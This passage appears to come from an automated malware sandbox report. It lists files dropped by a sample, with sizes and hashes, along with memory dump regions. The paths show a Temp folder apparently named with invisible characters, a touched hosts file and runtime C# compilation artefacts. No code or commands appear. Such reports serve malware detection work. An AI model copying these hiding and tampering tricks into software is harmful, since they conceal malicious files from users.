d0d76bb27e519af77283effc79975e0032d4c450a38bf69d24cc05797738a089

SHA512
646f3fdcd26ad8baf2452db526f9e13c09b9997eea6f8cbbf52f447916b0e17a8a9e1166effde510c8a81d4f388a3ee73209649ce0bcbdece07b0180b14144cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\HideDeny.docx

Filesize
13KB

MD5
5bff4d361b1e259b62aaa53bec445c0e

SHA1
08f4fc8390a54377c303d56e81d9ce4d4efc43ce

SHA256
8491001b2af6b59ef00370033c1848f8315d0af1b912a21790ef3bc80f3757c5

SHA512
a69bdff2310c1726d4366e541c8fe91d0357b2985c6479e6329b922079f66f4cc878cbd894266c46fd4028c41f4a089d3d6ad82595f8fbfcbcfb920257e1d839

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\InitializeTest.docx

Filesize
150KB

MD5
5bea497e76cccfcbfe294a5d39b2149f

SHA1
34fbffa3d1c58f8bf6ca66e06d78f00e0fb92b4c

SHA256
9952ddbf1caf8c7111f066b8400e1183aa133b59fb6b739a30cebc3612bfa49c

SHA512
5212f6a8129faf279c8b501b4342b8b49fe3a7fb7c75f12d1171697a3e6832f4e254a0c5a76d5d823631ea3da5b5d53588ffe3a32cbd7517567a4412adc7a703

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\LockGrant.docx

Filesize
14KB

MD5
9f261bb06823d8f04aedb81487e2d51d

SHA1
4fb60bdadd50d08514efac374030f55537b00e8d

SHA256
04bde2f00696cebda214d1a0821a6ed1d206a4b241923807c54a26d4a212148a

SHA512
7532113884ee6223e875218f205a95cecdd35a00ce27b81e29887d0aa8842c38d936679a6ac254e50a14cef5e7fcd7ae8e265c9e237e82209c827e4a816d5858

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\RemoveCopy.xlsx

Filesize
12KB

MD5
e46f3d9195f396a54835cb3f121e5ca4

SHA1
ec758c1aeaf446a476e8ed659d930f66e4c51e88

SHA256
f4911258612d491f92b3c380963082ea3f680b80af9ee11eb0351d76b0a1f815

SHA512
cfc532d47de9a8ae6d84e20021ee21bac62b7346d649e58cf9bb9f65dec0598c06c04adf3a0152c7dadbe9b99ad78ca3efd361d21ee5dec1fcccae3627d409e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\ResumeUnprotect.xlsx

Filesize
9KB

MD5
6a3f4b262d425316e40da87dfec84111

SHA1
8b6490075a281088665e71e043d44da5209631f4

SHA256
3741fdeaa5ba3d19065d9a45d781aaee85f4584d5ba7a57a35cc730289531ca7

SHA512
d86941b64191492d77f91ce966c3ee0444bc49539308f5600ebef433a12851731b8247668549a725314992c4f3b7aac7e34f5cdb1ffcb511d3afedd6866506d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\SetCheckpoint.mp3

Filesize
141KB

MD5
8983d7e150d68677eb6590c7b9feef54

SHA1
618f09f6a41ba878264719eaabb3b8fbe9fc9c48

SHA256
9fe03a6acf0a3996bb7edb0a71a6770f228672cc36f311d30bff1294b7d8337e

SHA512
97d2ad1eca80e1912028ce7cc73dc2fb36caf615b09ae02ee75fc5c11fbd4eebf053af5927f3d8e2a1cf69f9c93edc73a393e96e631c3cb22e63974b2943ced3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\StepBackup.jfif

Filesize
355KB

MD5
f12c7d5b7257a0914e85717b0f2c9bd2

SHA1
bac22f5681f2460c24c9dd200fc55aa2ffb9c3d3

SHA256
f07eb490667a430158868c7fad6a23775a0edc0ab143d92834bc73e3b2f6575e

SHA512
677efdf618e821379268f2ded69a020447f1cef58200136c3c675304c6a037b67c4c0e55a1d6ff3b20e7ca9021deb18d04dd2a591715cf2a27cde4fbeae0dc55

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\UnprotectSuspend.png

Filesize
326KB

MD5
c91e7530967a210d67d7422abd7a0461

SHA1
068435ca5ef9cce07e167412c56641abc7d24c0c

SHA256
469d9aa4523604c7c5a7ee07232cd8ee55ed7fb6c31385f4d8d63d108dc53233

SHA512
19c6511fa78c78323df7a54cd9148f31635029b06fe33903202aeb9734e004f2376a3812c3022c4814696cb416822d42fdfc89a0fb282b6ed2316a2bf4c93b77

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Desktop\WaitConnect.docx

Filesize
14KB

MD5
9661b7fcabb79aabf5c6780bac7d2a32

SHA1
dbf3d311f920f78e476872352edb2a8e2d732ed3

SHA256
6df04bae6b11f4e374c657568a402a3c548d86079496e2b0cd00f38a8221d76e

SHA512
227e9f29ae35ca064c7a617ea427396a3b39d5ba0e537badeb1e1e4c4f5f22541b8e8b57a4c1e6956d93f3b2aca9508ffe53a3000b9e78b4b3376a8b47dec761

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‌\Common Files\Documents\CheckpointDisconnect.xlsx

Filesize
12KB

MD5
2e4eb42293cef19daa61fd0e3d6fa37d

SHA1
c2387d6ba0f30c62e31cd8a5a0fdcd6535ba4df0

SHA256
34d41d7c249ee89e9b9c2dd05735c726d16e71d14a2fe61d17e0cbe91b7e0f0d

SHA512
3bca80a502fe89df6b8906a652654c47034664d376f1a27d64a74ed4c280c9545a5d7d17659d60dec01be9b9b2f4232fc67471c8d5afe2607855d8eb197fd4f8

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cf5makki\CSCA85C580AFA27456EA66AFF2A316CB8F1.TMP

Filesize
652B

MD5
4695813ddd18bc8eba1e7864109636f6

SHA1
bd18b64a20b9a7d74e94143efd3691fe9181acb2

SHA256
ae6b71cea08da77cacc19d78a4f676521c3015b1cfe685214cdd04b7c1049e29

SHA512
edee11f4a1d9976df729be76097423ba02bbe0e638dd2b80e0567d3351538f0ef2c53bf36a4d9aa5279f057d8fdc9756ccc38833911caaae27e25ce9cc075448

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cf5makki\cf5makki.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cf5makki\cf5makki.cmdline

Filesize
607B

MD5
63ace5373d61af09d145ba069a395f30

SHA1
c831c115f62afbb79b8ebe9f88786b6fb27bd615

SHA256
de7bc08eb421a3b237ec0a5d2562950148db68c58d9e23b73772d17ed7f0f0c7

SHA512
f769c3be8ef7e72eba37860a73bc6bfc988731b3a692b4a726617e4bfdcd63e19017c1c634350c86b8943e1032b11939c103a9fca2f09eea074d71b1db5673f7

Download Submit
memory/512-168-0x00007FFF73350000-0x00007FFF73E11000-memory.dmp

Filesize
10.8MB

Download
memory/512-86-0x00007FFF73353000-0x00007FFF73355000-memory.dmp

Filesize
8KB

Download
memory/512-89-0x00007FFF73350000-0x00007FFF73E11000-memory.dmp

Filesize
10.8MB

Download
memory/512-95-0x000002C0FC2E0000-0x000002C0FC302000-memory.dmp

Filesize
136KB

Download
memory/512-87-0x00007FFF73350000-0x00007FFF73E11000-memory.dmp

Filesize
10.8MB

Download
memory/2348-209-0x00000145493B0000-0x00000145493B8000-memory.dmp

Filesize
32KB

Download
memory/3212-56-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp

Filesize
100KB

Download
memory/3212-277-0x000001D066E60000-0x000001D0671D8000-memory.dmp

Filesize
3.5MB

Download
memory/3212-84-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp

Filesize
1.1MB

Download
memory/3212-83-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp

Filesize
100KB

Download
memory/3212-78-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp

Filesize
180KB

Download
memory/3212-79-0x00007FFF88180000-0x00007FFF8818D000-memory.dmp

Filesize
52KB

Download
memory/3212-76-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp

Filesize
80KB

Download
memory/3212-169-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp

Filesize
100KB

Download
memory/3212-70-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp

Filesize
5.9MB

Download
memory/3212-71-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp

Filesize
736KB

Download
memory/3212-263-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp

Filesize
184KB

Download
memory/3212-73-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp

Filesize
3.5MB

Download
memory/3212-30-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp

Filesize
140KB

Download
memory/3212-276-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp

Filesize
736KB

Download
memory/3212-74-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp

Filesize
140KB

Download
memory/3212-72-0x000001D066E60000-0x000001D0671D8000-memory.dmp

Filesize
3.5MB

Download
memory/3212-66-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp

Filesize
184KB

Download
memory/3212-64-0x00007FFF8BA90000-0x00007FFF8BA9D000-memory.dmp

Filesize
52KB

Download
memory/3212-62-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp

Filesize
100KB

Download
memory/3212-60-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp

Filesize
1.5MB

Download
memory/3212-58-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp

Filesize
140KB

Download
memory/3212-88-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp

Filesize
1.5MB

Download
memory/3212-85-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp

Filesize
140KB

Download
memory/3212-54-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp

Filesize
180KB

Download
memory/3212-322-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp

Filesize
1.5MB

Download
memory/3212-25-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp

Filesize
5.9MB

Download
memory/3212-293-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp

Filesize
3.5MB

Download
memory/3212-295-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp

Filesize
80KB

Download
memory/3212-317-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp

Filesize
140KB

Download
memory/3212-331-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp

Filesize
1.1MB

Download
memory/3212-316-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp

Filesize
5.9MB

Download
memory/3212-48-0x00007FFF8D8A0000-0x00007FFF8D8AF000-memory.dmp

Filesize
60KB

Download
memory/3212-332-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp

Filesize
5.9MB

Download
memory/3212-351-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp

Filesize
100KB

Download
memory/3212-357-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp

Filesize
736KB

Download
memory/3212-356-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp

Filesize
184KB

Download
memory/3212-355-0x00007FFF8BA90000-0x00007FFF8BA9D000-memory.dmp

Filesize
52KB

Download
memory/3212-354-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp

Filesize
100KB

Download
memory/3212-353-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp

Filesize
1.5MB

Download
memory/3212-352-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp

Filesize
140KB

Download
memory/3212-350-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp

Filesize
180KB

Download
memory/3212-349-0x00007FFF8D8A0000-0x00007FFF8D8AF000-memory.dmp

Filesize
60KB

Download
memory/3212-348-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp

Filesize
140KB

Download
memory/3212-347-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp

Filesize
3.5MB

Download
memory/3212-346-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp

Filesize
1.1MB

Download
memory/3212-345-0x00007FFF88180000-0x00007FFF8818D000-memory.dmp

Filesize
52KB

Download
memory/3212-344-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp

Filesize
80KB

Download